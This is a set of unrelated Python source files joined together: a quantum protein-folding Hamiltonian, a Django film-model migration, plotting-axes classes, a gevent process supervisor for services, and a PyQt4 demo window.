if counter[h] > math.log2(j-i):
continue
else:
counter[h] += 1
a, b = self.half_adder(sum_string[h],
sum_string[h+1])
sum_string[h] = a
sum_string[h+1] = b
maximum = int(math.ceil(math.log2(j-i)))
sum_string = list(reversed(sum_string))
self._sum_strings[(i, j, k)] = [sp.expand(sum_string[x]) for x in range(maximum)]
return self._sum_strings[(i, j, k)]
def back_term(self):
"""Ensures that the chain does not go
back on itself."""
return sum([
self.circuit_xp(self.get(self.pointer(i)),
self.get(self.pointer(i)+1)) *
self.circuit_xn(self.get(self.pointer(i+1)),
self.get(self.pointer(i+1)+1)) + \
self.circuit_xn(self.get(self.pointer(i)),
self.get(self.pointer(i)+1)) *
self.circuit_xp(self.get(self.pointer(i+1)),
self.get(self.pointer(i+1)+1)) + \
self.circuit_yp(self.get(self.pointer(i)),
self.get(self.pointer(i)+1)) *
self.circuit_yn(self.get(self.pointer(i+1)),
self.get(self.pointer(i+1)+1)) + \
self.circuit_yn(self.get(self.pointer(i)),
self.get(self.pointer(i)+1)) *
self.circuit_yp(self.get(self.pointer(i+1)),
self.get(self.pointer(i+1)+1))
for i in range(self.naas-2)])
def overlap(self, i, j):
"""Computes the overlap term for residues i and j."""
maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0
if (j-i) % 2 != 0 or maximum < 2: return sp.numbers.Integer(0)
sumstring = {
'x+': self.sum_string(i, j, 'x+'),
'x-': self.sum_string(i, j, 'x-'),
'y+': self.sum_string(i, j, 'y+'),
'y-': self.sum_string(i, j, 'y-')
}
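        # Residues i and j coincide iff, on each axis, the count of + turns
        # equals the count of - turns between them; the XNORs below test
        # bitwise equality of those binary counts.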
return qand(
[qxnor(sumstring['x+'][r],
sumstring['x-'][r])
for r in range(maximum)] + \
[qxnor(sumstring['y+'][r],
sumstring['y-'][r])
for r in range(maximum)]
)
def steric_term(self):
"""Ensures that the chain does not overlap."""
return sum([
sum([
self.overlap(i, j)
for j in range(i+1, self.naas)])
for i in range(self.naas)])
def a_x(self, i, j):
sumstring = {
'x+': self.sum_string(i, j, 'x+'),
'x-': self.sum_string(i, j, 'x-'),
'y+': self.sum_string(i, j, 'y+'),
'y-': self.sum_string(i, j, 'y-')
}
maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0
if maximum == 0: return 0
prefactor = qand([
qxnor(sumstring['y+'][r],
sumstring['y-'][r])
for r in range(maximum)])
return prefactor * \
( qxor(sumstring['x+'][0],
sumstring['x-'][0]) \
* qand([
qxnor(sumstring['x+'][r],
sumstring['x-'][r])
for r in range(1, maximum)]) \
+ sum([
qxor(sumstring['x+'][p-2],
sumstring['x+'][p-1]) \
* qand([
qxnor(sumstring['x+'][r-1],
sumstring['x+'][r])
for r in range(1, p-1)]) \
* qand([
qxor(sumstring['x+'][r-1],
sumstring['x-'][r-1])
for r in range(1, p+1)]) \
* qand([
qxnor(sumstring['x+'][r-1],
sumstring['x-'][r-1])
for r in range(p+1, maximum+1)])
for p in range(2, maximum+1)]))
def a_y(self, i, j):
sumstring = {
'x+': self.sum_string(i, j, 'x+'),
'x-': self.sum_string(i, j, 'x-'),
'y+': self.sum_string(i, j, 'y+'),
'y-': self.sum_string(i, j, 'y-')
}
maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0
if maximum == 0: return 0
prefactor = qand([
qxnor(sumstring['x+'][r],
sumstring['x-'][r])
for r in range(maximum)])
return prefactor *\
( qxor(sumstring['y+'][0],
sumstring['y-'][0]) \
* qand([
qxnor(sumstring['y+'][r],
sumstring['y-'][r])
for r in range(1, maximum)]) \
+ sum([
qxor(sumstring['y+'][p-2],
sumstring['y+'][p-1]) \
* qand([
qxnor(sumstring['y+'][r-1],
sumstring['y+'][r])
for r in range(1, p-1)]) \
* qand([
qxor(sumstring['y+'][r-1],
sumstring['y-'][r-1])
for r in range(1, p+1)]) \
* qand([
qxnor(sumstring['y+'][r-1],
sumstring['y-'][r-1])
for r in range(p+1, maximum+1)])
for p in range(2, maximum+1)]))
def interaction_term_ij(self, i, j):
return -1 * self.int_mat[i, j] * (self.a_x(i, j) + \
self.a_y(i, j))
def interaction_term(self):
"""Computes contacts between residues."""
expr = sp.numbers.Integer(0)
for i in range(self.naas-3):
for j in range(1, math.ceil((self.naas-i-1)/2)):
if self.int_mat[i, 1+i+2*j] == 0: continue
expr += self.interaction_term_ij(i, 1+i+2*j)
return expr
class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian):
is_3D = True
@property
def dim(self):
return 3
def pointer(self, i):
"""Points to the start of the string describing
the ith turn."""
return 3*i
def circuit_xp(self, q_i, q_j, q_k):
"""Implements a circuit that returns 1
if the chain moves in the direction x+."""
return q_i * q_j * q_k
def circuit_xn(self, q_i, q_j, q_k):
"""Implements a circuit that returns 1
if the chain moves in the direction x-."""
return q_i * (1-q_j) * (1-q_k)
def circuit_yp(self, q_i, q_j, q_k):
"""Implements a circuit that returns 1
if the chain moves in the direction y+."""
return q_i * (1-q_j) * q_k
def circuit_yn(self, q_i, q_j, q_k):
"""Implements a circuit that returns 1
if the chain moves in the direction y-."""
return q_i * q_j * (1-q_k)
def circuit_zp(self, q_i, q_j, q_k):
"""Implements a circuit that returns 1
if the chain moves in the direction z+."""
return (1-q_i) * (1-q_j) * q_k
def circuit_zn(self, q_i, q_j, q_k):
"""Implements a circuit that returns 1
if the chain moves in the direction z-."""
return (1-q_i) * q_j * (1-q_k)
def circuit_000(self, q_i, q_j, q_k):
"""Implements a circuit that checks the
nonsensical string 000."""
return (1-q_i) * (1-q_j) * (1-q_k)
def circuit_011(self, q_i, q_j, q_k):
"""Implements a circuit that checks the
nonsensical string 000."""
return (1-q_i) * q_j * q_k
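    # Three-qubit direction encoding implied by the circuits above:
    #   (q_i, q_j, q_k) = (1, 1, 1) -> x+,  (1, 0, 0) -> x-,  (1, 0, 1) -> y+,
    #   (1, 1, 0) -> y-,  (0, 0, 1) -> z+,  (0, 1, 0) -> z-;
    #   000 and 011 encode no direction and are penalised by redun_term().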
def sum_string(self, i, j, k):
"""Computes the sum string."""
if i > j:
raise ValueError("i > j")
if (i, j, k) in self._sum_strings.keys():
return self._sum_strings[(i, j, k)]
if k == 'x+':
sum_string = [self.circuit_xp(self.get(self.pointer(t)),
self.get(self.pointer(t)+1),
self.get(self.pointer(t)+2))
for t in range(i, j)]
elif k == 'x-':
sum_string = [self.circuit_xn(self.get(self.pointer(t)),
self.get(self.pointer(t)+1),
self.get(self.pointer(t)+2))
for t in range(i, j)]
elif k == 'y+':
sum_string = [self.circuit_yp(self.get(self.pointer(t)),
self.get(self.pointer(t)+1),
self.get(self.pointer(t)+2))
for t in range(i, j)]
elif k == 'y-':
sum_string = [self.circuit_yn(self.get(self.pointer(t)),
self.get(self.pointer(t)+1),
self.get(self.pointer(t)+2))
for t in range(i, j)]
elif k == 'z+':
sum_string = [self.circuit_zp(self.get(self.pointer(t)),
self.get(self.pointer(t)+1),
self.get(self.pointer(t)+2))
for t in range(i, j)]
elif k == 'z-':
sum_string = [self.circuit_zn(self.get(self.pointer(t)),
self.get(self.pointer(t)+1),
self.get(self.pointer(t)+2))
for t in range(i, j)]
else:
raise ValueError('k was {:s}'.format(k))
n_layers = j-i-1
counter = np.zeros(n_layers) # lazy way to keep track of half-adders
sum_string = list(reversed(sum_string))
for t in chain(range(n_layers),
reversed(range(n_layers-1))):
if t % 2 == 0:
iterator = range(0, t+1, 2) if t > 0 else [0]
else:
iterator = range(1, t+1, 2) if t > 1 else [1]
for h in iterator:
if self.ss_fmat == 'babej':
if counter[h] > math.log2(j-i):
continue
else:
counter[h] += 1
a, b = self.half_adder(sum_string[h],
sum_string[h+1])
sum_string[h] = a
sum_string[h+1] = b
maximum = int(math.ceil(math.log2(j-i)))
sum_string = list(reversed(sum_string))
self._sum_strings[(i, j, k)] = [sp.expand(sum_string[x]) for x in range(maximum)]
return self._sum_strings[(i, j, k)]
def redun_term(self):
"""Implements the term that penalises meaningless
residue bitstrings 000 and 011."""
return sum([
self.circuit_000(self.get(self.pointer(k)),
self.get(self.pointer(k)+1),
self.get(self.pointer(k)+2)) + \
self.circuit_011(self.get(self.pointer(k)),
self.get(self.pointer(k)+1),
self.get(self.pointer(k)+2))
for k in range(self.naas-1)])
def back_term(self):
"""Ensures that the chain does not go
back on itself."""
return sum([
self.circuit_xp(self.get(self.pointer(i)),
self.get(self.pointer(i)+1),
self.get(self.pointer(i)+2)) *
self.circuit_xn(self.get(self.pointer(i+1)),
self.get(self.pointer(i+1)+1),
self.get(self.pointer(i+1)+2)) + \
self.circuit_xn(self.get(self.pointer(i)),
self.get(self.pointer(i)+1),
self.get(self.pointer(i)+2)) *
self.circuit_xp(self.get(self.pointer(i+1)),
self.get(self.pointer(i+1)+1),
self.get(self.pointer(i+1)+2)) + \
self.circuit_yp(self.get(self.pointer(i)),
self.get(self.pointer(i)+1),
self.get(self.pointer(i)+2)) *
self.circuit_yn(self.get(self.pointer(i+1)),
self.get(self.pointer(i+1)+1),
self.get(self.pointer(i+1)+2)) + \
self.circuit_yn(self.get(self.pointer(i)),
self.get(self.pointer(i)+1),
self.get(self.pointer(i)+2)) *
self.circuit_yp(self.get(self.pointer(i+1)),
self.get(self.pointer(i+1)+1),
self.get(self.pointer(i+1)+2)) + \
self.circuit_zp(self.get(self.pointer(i)),
self.get(self.pointer(i)+1),
self.get(self.pointer(i)+2)) *
self.circuit_zn(self.get(self.pointer(i+1)),
self.get(self.pointer(i+1)+1),
self.get(self.pointer(i+1)+2)) + \
self.circuit_zn(self.get(self.pointer(i)),
self.get(self.pointer(i)+1),
self.get(self.pointer(i)+2)) *
self.circuit_zp(self.get(self.pointer(i+1)),
self.get(self.pointer(i+1)+1),
self.get(self.pointer(i+1)+2))
for i in range(self.naas-2)])
def overlap(self, i, j):
"""Computes the overlap term for residues i and j."""
maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0
if (j-i) % 2 != 0 or maximum < 2: return sp.numbers.Integer(0)
sumstring = {
'x+': self.sum_string(i, j, 'x+'),
'x-': self.sum_string(i, j, 'x-'),
'y+': self.sum_string(i, j, 'y+'),
'y-': self.sum_string(i, j, 'y-'),
'z+': self.sum_string(i, j, 'z+'),
'z-': self.sum_string(i, j, 'z-'),
}
return qand(
[qxnor(sumstring['x+'][r],
sumstring['x-'][r])
for r in range(maximum)] + \
[qxnor(sumstring['y+'][r],
sumstring['y-'][r])
for r in range(maximum)] + \
[qxnor(sumstring['z+'][r],
sumstring['z-'][r])
for r in range(maximum)]
)
def steric_term(self):
"""Ensures that the chain does not overlap."""
return sum([
sum([
self.overlap(i, j)
for j in range(i+1, self.naas)])
for i in range(self.naas)])
def a_x(self, i, j):
sumstring = {
'x+': self.sum_string(i, j, 'x+'),
'x-': self.sum_string(i, j, 'x-'),
'y+': self.sum_string(i, j, 'y+'),
'y-': self.sum_string(i, j, 'y-'),
'z+': self.sum_string(i, j, 'z+'),
'z-': self.sum_string(i, j, 'z-')
}
maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0
if maximum == 0: return 0
prefactor = qand([
qand([
qxnor(sumstring['%s+' % k][r],
sumstring['%s-' % k][r])
for r in range(maximum)])
for k in ['y', 'z']])
return prefactor * \
( qxor(sumstring['x+'][0],
sumstring['x-'][0]) \
* qand([
qxnor(sumstring['x+'][r],
sumstring['x-'][r])
for r in range(1, maximum)]) \
+ sum([
qxor(sumstring['x+'][p-2],
sumstring['x+'][p-1]) \
* qand([
qxnor(sumstring['x+'][r-1],
sumstring['x+'][r])
for r in range(1, p-1)]) \
* qand([
qxor(sumstring['x+'][r-1],
sumstring['x-'][r-1])
for r in range(1, p+1)]) \
* qand([
qxnor(sumstring['x+'][r-1],
sumstring['x-'][r-1])
for r in range(p+1, maximum+1)])
for p in range(2, maximum+1)]))
def a_y(self, i, j):
sumstring = {
'x+': self.sum_string(i, j, 'x+'),
'x-': self.sum_string(i, j, 'x-'),
'y+': self.sum_string(i, j, 'y+'),
'y-': self.sum_string(i, j, 'y-'),
'z+': self.sum_string(i, j, 'z+'),
'z-': self.sum_string(i, j, 'z-')
}
maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0
if maximum == 0: return 0
prefactor = qand([
qand([
qxnor(sumstring['%s+' % k][r],
sumstring['%s-' % k][r])
for r in range(maximum)])
for k in ['x', 'z']])
return prefactor * \
( qxor(sumstring['y+'][0],
sumstring['y-'][0]) \
* qand([
qxnor(sumstring['y+'][r],
sumstring['y-'][r])
for r in range(1, maximum)]) \
+ sum([
qxor(sumstring['y+'][p-2],
sumstring['y+'][p-1]) \
* qand([
qxnor(sumstring['y+'][r-1],
sumstring['y+'][r])
for r in range(1, p-1)]) \
* qand([
qxor(sumstring['y+'][r-1],
sumstring['y-'][r-1])
for r in range(1, p+1)]) \
* qand([
qxnor(sumstring['y+'][r-1],
sumstring['y-'][r-1])
for r in range(p+1, maximum+1)])
for p in range(2, maximum+1)]))
def a_z(self, i, j):
sumstring = {
'x+': self.sum_string(i, j, 'x+'),
'x-': self.sum_string(i, j, 'x-'),
'y+': self.sum_string(i, j, 'y+'),
'y-': self.sum_string(i, j, 'y-'),
'z+': self.sum_string(i, j, 'z+'),
'z-': self.sum_string(i, j, 'z-')
}
maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0
if maximum == 0: return 0
prefactor = qand([
qand([
qxnor(sumstring['%s+' % k][r],
sumstring['%s-' % k][r])
for r in range(maximum)])
for k in ['x', 'y']])
return prefactor * \
( qxor(sumstring['z+'][0],
sumstring['z-'][0]) \
* qand([
qxnor(sumstring['z+'][r],
sumstring['z-'][r])
for r in range(1, maximum)]) \
+ sum([
qxor(sumstring['z+'][p-2],
sumstring['z+'][p-1]) \
* qand([
qxnor(sumstring['z+'][r-1],
sumstring['z+'][r])
for r in range(1, p-1)]) \
* qand([
qxor(sumstring['z+'][r-1],
sumstring['z-'][r-1])
for r in range(1, p+1)]) \
* qand([
qxnor(sumstring['z+'][r-1],
sumstring['z-'][r-1])
for r in range(p+1, maximum+1)])
for p in range(2, maximum+1)]))
def interaction_term_ij(self, i, j):
return -1* self.int_mat[i, j] * (self.a_x(i, j) + \
self.a_y(i, j) + \
self.a_z(i, j))
def interaction_term(self):
"""Computes contacts between residues."""
expr = sp.numbers.Integer(0)
for i in range(self.naas-3):
for j in range(1, math.ceil((self.naas-i-1)/2)):
if self.int_mat[i, 1+i+2*j] == 0: continue
                expr += self.interaction_term_ij(i, 1+i+2*j)
return expr
| 2.359375 | 2 |
films/migrations/0001_initial.py | LucaAlexandru/MediaTracker | 0 | 12797484 | # Generated by Django 3.2.4 on 2021-10-11 10:34
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Film',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('film_name', models.CharField(max_length=100)),
('film_release_date', models.DateField(null=True)),
('film_genre', models.CharField(max_length=50)),
('film_rating', models.CharField(choices=[('unrated', 'Unrated'), ('1', '1'), ('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'), ('6', '6'), ('7', '7'), ('8', '8'), ('9', '9'), ('10', '10')], default='unrated', max_length=10)),
('film_type', models.CharField(choices=[('movie', 'Movie'), ('tv_show', 'TV Show'), ('animated_film', 'Animated film'), ('animated_show', 'Animated show')], default='movie', max_length=50)),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| 1.859375 | 2 |
oculy/plotting/plots/axes.py | MatthieuDartiailh/oculy | 0 | 12797485 | <gh_stars>0
# --------------------------------------------------------------------------------------
# Copyright 2020-2021 by Oculy Authors, see git history for more details.
#
# Distributed under the terms of the BSD license.
#
# The full license is in the file LICENCE, distributed with this software.
# --------------------------------------------------------------------------------------
"""Axis, axes, colorbar and their associated proxy.
"""
from typing import Any, Mapping, Optional, Sequence, Tuple
from atom.api import Bool, Dict, Enum, Float, ForwardTyped, Int, List, Str
from atom.api import Tuple as ATuple
from atom.api import Typed
from ..backends.resolver import BackendResolver
from .base import BasePlot, PlotElement, PlotElementProxy, mark_backend_unsupported
class AxisProxy(PlotElementProxy):
"""Proxy for a single axis.
Handle:
- scaling
- bounds
"""
@mark_backend_unsupported
def set_axis_scale(self, scale): # lin, log
raise NotImplementedError()
@mark_backend_unsupported
def set_autoscaling(self, setting: bool):
pass
@mark_backend_unsupported
def set_limits(self, limits): # Limited to axis with no breaks
pass
@mark_backend_unsupported
def set_limits_with_breaks(self, limits):
pass
@mark_backend_unsupported
def invert_axis(self, state: bool):
pass
@mark_backend_unsupported
def set_label(self, title: str, font: Mapping[str, Any]):
pass
@mark_backend_unsupported
def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]):
pass
@mark_backend_unsupported
def set_tick_position(self, position: str):
pass
class ColorbarProxy(PlotElementProxy):
"""Proxy for the colorbar attached to a colorplot."""
@mark_backend_unsupported
def set_axis_scale(self, scale): # lin, log
raise NotImplementedError()
@mark_backend_unsupported
def set_autoscaling(self, setting: bool):
pass
@mark_backend_unsupported
def set_limits(self, limits): # Limited to axis with no breaks
pass
@mark_backend_unsupported
def set_limits_with_breaks(self, limits):
pass
@mark_backend_unsupported
def set_label(self, title: str, font: Mapping[str, Any]):
pass
@mark_backend_unsupported
def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]):
pass
class CursorProxy(PlotElementProxy):
"""Proxy for a cursor."""
pass
class AxesProxy(PlotElementProxy):
"""Proxy for axes.
As in matplotlib an axis is expected to provide way to draw into the axis
and way to manipulate the axis appearance.
"""
@mark_backend_unsupported
def enable_zooming(self, bound: str, button: str):
pass
@mark_backend_unsupported
def disable_zooming(self):
pass
@mark_backend_unsupported
def enable_panning(self, button: str):
pass
@mark_backend_unsupported
def disable_panning(self):
pass
@mark_backend_unsupported
def add_axis(self, axes=None):
pass
@mark_backend_unsupported
def remove_axis(self):
pass
@mark_backend_unsupported
def set_projections(self):
pass
@mark_backend_unsupported
def add_cursor(
self, axes=None
): # Need to specify to which axes the cursor is bound
pass
@mark_backend_unsupported
def remove_cursor(self):
pass
@mark_backend_unsupported
def enable_major_grid(self):
pass
@mark_backend_unsupported
def disable_major_grid(self):
pass
@mark_backend_unsupported
def enable_minor_grid(self):
pass
@mark_backend_unsupported
def disable_minor_grid(self):
pass
@mark_backend_unsupported
def set_legend(self, legend: Mapping[str, str]):
pass
@mark_backend_unsupported
    def remove_plot(self, id, plot):
pass
@mark_backend_unsupported
def add_line(
self,
id: str,
orientation: str,
position: float,
bounds: Optional[Tuple[float, float]] = None,
):
pass
@mark_backend_unsupported
def remove_line(self, id: str) -> None:
pass
class Axis(PlotElement):
"""Axis of a plot."""
#: Reference to the parent axes.
axes = ForwardTyped(lambda: Axes)
#: Should that axis be autoscaled
auto_scaling = Bool()
    #: List of 2-tuples representing a possibly discontinuous axis.
limits = List(tuple)
#: Is the axis direction inverted.
inverted = Bool()
#: Label of the axis
label = Str()
#: Tick labels.
tick_labels = List(str)
#: Font used for the label
label_font = Dict(str)
#: Font used for the tick labels
tick_labels_font = Dict(str)
#: Intercept position of this axis with the other axis in data coordinate.
#: Setting this values will have an impact only if there are only 2 active
#: axes in the axes_set.
intercept = Float()
# FIXME Add connections to the proxy and a way to prevent self recursion
# FIXME Add convenience to connect axes between them
class Colorbar(PlotElement):
"""Colorbar for a 2D plot."""
#: Reference to the parent axes.
axes = ForwardTyped(lambda: Axes)
#: Position at which the colorbar should be created.
location = Enum("right", "top", "left", "bottom")
#: Should that axis be autoscaled
auto_scaling = Bool()
    #: List of 2-tuples representing a possibly discontinuous axis.
limits = List(tuple)
#: Label of the axis
label = Str()
#: Tick labels.
tick_labels = List(str)
#: Font used for the label
label_font = Dict(str)
#: Font used for the tick labels
tick_labels_font = Dict(str)
#:
aspect_ratio = Int(20)
class Cursor(PlotElement):
"""Cursor on a plot."""
    #: Position of the cursor along the x axis.
    x_value = Float()
    #: Position of the cursor along the y axis.
    y_value = Float()
    #: Value under the cursor for plots with a color dimension (NaN otherwise).
    c_value = Float(float("nan"))
# FIXME need to sync to the proxy
def _resolve_figure():
from .figure import Figure
return Figure
class Axes(PlotElement):
"""Axes of a plot"""
#: Reference to the figure holding the axes.
figure = ForwardTyped(_resolve_figure)
#: Axes composing this object.
left_axis = Typed(Axis)
bottom_axis = Typed(Axis)
right_axis = Typed(Axis)
top_axis = Typed(Axis)
#: Colorbar associated with plot if any.
colorbar = Typed(Colorbar)
#: Set of cursors currently active on the graph
cursors = ATuple(Cursor)
#: Set of plots currently displayed in the axes
plots = Dict(str, BasePlot)
#: Display a major grid
major_grid_enabled = Bool()
#: Display a minor grid
minor_grid_enabled = Bool()
    #: Legend entries of the axes. SHOULD NOT be edited in place.
legends = Dict(str, str)
#: Projection to use on the axes.
projection = Enum("cartesian", "polar")
def __init__(self, **kwargs):
super().__init__(**kwargs)
        if not (self.bottom_axis or self.top_axis):
            self.bottom_axis = Axis(axes=self)
        if not (self.left_axis or self.right_axis):
            self.left_axis = Axis(axes=self)
def initialize(self, resolver):
"""Initialize the proxy of the object and the axes."""
super().initialize(resolver)
for axis in (self.left_axis, self.bottom_axis, self.right_axis, self.top_axis):
if not axis:
continue
axis.backend_name = self.backend_name
axis.initialize(resolver)
if self.colorbar:
self.colorbar.backend_name = self.backend_name
self.colorbar.initialize(resolver)
for c in self.cursors:
c.backend_name = self.backend_name
c.initialize(resolver)
for p in self.plots.values():
p.backend_name = self.backend_name
p.initialize(resolver)
#: Conserve a reference to the resolver to be able to add more elements
#: later on.
self._resolver = resolver
def finalize(self):
"""Finalize the proxy of the figure."""
for p in self.plots.values():
p.finalize()
for c in self.cursors:
c.finalize()
if self.colorbar:
self.colorbar.finalize()
        for axis in (self.top_axis, self.right_axis, self.bottom_axis, self.left_axis):
            if not axis:
                continue
            axis.finalize()
super().finalize()
def add_cursor(self, axes: Tuple[str, str]): # What axis are we linked to
pass
def remove_cursor(self, index: int):
pass
def add_plot(self, plot) -> None:
"""Add a plot to the axes."""
if plot.id in self.plots:
raise RuntimeError(f"A plot with {id} already exist in axes {self}")
axes = plot.axes_mapping
if not axes:
axes = {
"x": "bottom" if self.bottom_axis else "top",
"y": "left" if self.left_axis else "right",
}
plot.axes_mapping = axes
# Validate the axes supposed to be used.
if any(
(
pa not in ("left", "bottom", "right", "top")
or getattr(self, f"{pa}_axis") is None
)
for pa in axes.values()
):
unknown = []
missing = []
for lab, pa in axes.items():
if pa not in ("left", "bottom", "right", "top"):
unknown.append((lab, pa))
elif getattr(axes, f"{pa}_axis") is None:
missing.append((lab, pa))
            if unknown:
                raise RuntimeError(
                    f"The axes used for {[lab for lab, _ in unknown]} do not "
                    "correspond to any valid axes (valid axes are "
                    "'left', 'right', 'top', 'bottom', provided axes are "
                    f"{[pa for _, pa in unknown]})."
                )
            else:
                raise RuntimeError(
                    f"The axes used for {[lab for lab, _ in missing]} do not "
                    "exist. Existing axes are "
                    f"{[a for a in ('left', 'bottom', 'right', 'top') if getattr(self, f'{a}_axis') is not None]}, "
                    f"specified axes are {[pa for _, pa in missing]}."
                )
# Make sure the plot knows where it is plotted.
plot.axes = self
self.plots[plot.id] = plot
# Initialize the plot if we have a resolver
if self._resolver:
plot.initialize(self._resolver)
def remove_plot(self, id):
"""Remove a plot based on its ID."""
if id not in self.plots:
raise KeyError(
f"Plot {id} does not exist in axes {self.axes},"
f" known plots are {self.plots}"
)
if not self.proxy:
raise RuntimeError(f"Axes {self} does not have an active proxy.")
        self.proxy.remove_plot(id, self.plots[id])
        del self.plots[id]
def add_colorbar(self):
"""Add a colorbar to the axes."""
if self.colorbar:
return
self.colorbar = Colorbar(axes=self)
if self._resolver:
self.colorbar.initialize(self._resolver)
def remove_colorbar(self):
"""Remove the colorbar from the axes."""
self.colorbar.finalize()
del self.colorbar
def add_line(
self,
id: str,
orientation: str,
position: float,
bounds: Optional[Tuple[float, float]] = None,
):
pass
def remove_line(self, id: str) -> None:
pass
# FIXME Need to define the proper API to enable zooming/panning and modifiers
    # TODO Add the ability to link axes (across different figures, ie beyond
# matplotlib default)
# --- Private API
#: Reference to the backend resolver needed to dynamically add axes
_resolver = Typed(BackendResolver)
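# Minimal usage sketch (a sketch only: assumes a concrete BackendResolver
# instance named `resolver` and a plot object exposing `id`/`axes_mapping`):
#   axes = Axes()
#   axes.initialize(resolver)
#   axes.add_plot(plot)
#   axes.add_colorbar()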
| 2.125 | 2 |
python_obfuscator/helpers/__init__.py | gjp4tw/python-obfuscator | 61 | 12797486 | from .variable_name_generator import VariableNameGenerator
from .random_datatype import RandomDataTypeGenerator
| 1.179688 | 1 |
iris/services/node.py | kpanic/lymph | 0 | 12797487 | import json
import logging
import gevent
import os
import psutil
import six
from gevent import subprocess
from six.moves import range
from iris.core.interfaces import Interface
from iris.utils.sockets import create_socket
logger = logging.getLogger(__name__)
class Process(object):
def __init__(self, cmd, env=None):
self.cmd = cmd
self.env = env
self._process = None
self._popen = None
def is_running(self):
return self._process and self._process.is_running()
def start(self):
self._popen = subprocess.Popen(
self.cmd, env=self.env, close_fds=False)
self._process = psutil.Process(self._popen.pid)
def stop(self):
try:
self._process.terminate()
self._process.wait()
except psutil.NoSuchProcess:
pass
def restart(self):
print("restarting %s" % self)
self.stop()
self.start()
def stats(self):
try:
memory = self._process.memory_info()
return {
'memory': {'rss': memory.rss, 'vms': memory.vms},
'cpu': self._process.cpu_percent(interval=2.0),
}
except psutil.NoSuchProcess:
return {}
class Node(Interface):
register_with_coordinator = False
def __init__(self, *args, **kwargs):
super(Node, self).__init__(*args, **kwargs)
self.sockets = {}
self.processes = []
self.running = False
self._sockets = []
self._services = []
def stats(self):
process_stats = []
for p in self.processes:
if not p.is_running():
continue
process_stats.append({
'command': p.cmd,
'stats': p.stats(),
})
return {'processes': process_stats}
def apply_config(self, config):
for name, c in six.iteritems(config.get('instances', {})):
self._services.append((name, c.get('command'), c.get('numprocesses', 1)))
for name, c in six.iteritems(config.get('sockets', {})):
self._sockets.append((name, c.get('host'), c.get('port')))
def on_start(self):
self.create_shared_sockets()
self.running = True
shared_fds = json.dumps({port: s.fileno() for port, s in six.iteritems(self.sockets)})
for service_type, cmd, num in self._services:
env = os.environ.copy()
env['IRIS_NODE'] = self.container.endpoint
env['IRIS_NODE_IP'] = self.container.ip
env['IRIS_SHARED_SOCKET_FDS'] = shared_fds
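            # Child processes are expected to rebuild the shared sockets from
            # this variable; a sketch of the consumer side (assumed here, not
            # shown in this module):
            #   fds = json.loads(os.environ['IRIS_SHARED_SOCKET_FDS'])
            #   sock = socket.fromfd(fds[str(port)], socket.AF_INET, socket.SOCK_STREAM)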
for i in range(num):
p = Process(cmd.split(' '), env=env)
self.processes.append(p)
logger.info('starting %s', cmd)
p.start()
gevent.spawn(self.watch_processes)
def on_stop(self):
logger.info("waiting for all service processes to die ...")
self.running = False
for p in self.processes:
p.stop()
super(Node, self).on_stop()
def create_shared_sockets(self):
for name, host, port in self._sockets:
sock = create_socket(
'%s:%s' % (host or self.container.ip, port), inheritable=True)
self.sockets[port] = sock
def restart_all(self):
for process in self.processes:
process.stop()
def watch_processes(self):
while True:
for process in self.processes:
try:
                    status = process._process.status()  # psutil >= 2.0 exposes status() as a method
except psutil.NoSuchProcess:
if self.running:
process.start()
continue
if status in (psutil.STATUS_ZOMBIE, psutil.STATUS_DEAD):
if self.running:
process.restart()
gevent.sleep(1)
| 2.046875 | 2 |
pyqt_demo/test1.py | yzwxx/Label_Lab | 0 | 12797488 | <reponame>yzwxx/Label_Lab<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
a window with menu bar and tool bar
QAction with addAction for event handling(setting hot keys,showing status tip)
set window icon
'''
import os
from os.path import join
import sys
from PyQt4 import QtGui,QtCore
icon_path = join(os.getcwd(),'icon.png')
class Example1(QtGui.QMainWindow):
def __init__(self):
super(Example1, self).__init__()
self.initUI()
def initUI(self):
# text edit
textEdit = QtGui.QTextEdit()
self.setCentralWidget(textEdit)
# menubar's action
exitAction = QtGui.QAction('&Exit', self)
exitAction.setShortcut('Ctrl+Q')
exitAction.setStatusTip('Exit application')
exitAction.triggered.connect(QtGui.QApplication.quit)
self.statusBar().showMessage('Ready')
# menubar
menubar = self.menuBar()
menubar.setNativeMenuBar(False)
fileMenu = menubar.addMenu('&File')
fileMenu.addAction(exitAction) # binding the action to the menu in menubar
# toolbar
self.toolbar = QtGui.QToolBar('name')
self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)
self.toolbar.addAction(exitAction)
self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar)
self.toolbar2 = QtGui.QToolBar('name')
self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)
self.toolbar2.addAction(exitAction)
self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2)
self.setGeometry(500, 300, 550, 350) # set location of app windows on screen and its size
self.setWindowTitle('GUI Demo')
# window icon
self.setWindowIcon(QtGui.QIcon(icon_path))
# tooltip
# QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10))
# self.setToolTip('This is a <b>QWidget</b> widget')
# create buttons
btn = QtGui.QPushButton('Button', self)
# btn.setToolTip('This is a <b>QPushButton</b> widget')
btn.resize(btn.sizeHint())
btn.move(0, 300)
qbtn = QtGui.QPushButton('Quit', self)
qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit)
qbtn.resize(qbtn.sizeHint())
qbtn.move(100, 300)
# status bar
# self.statusBar().showMessage('Ready')
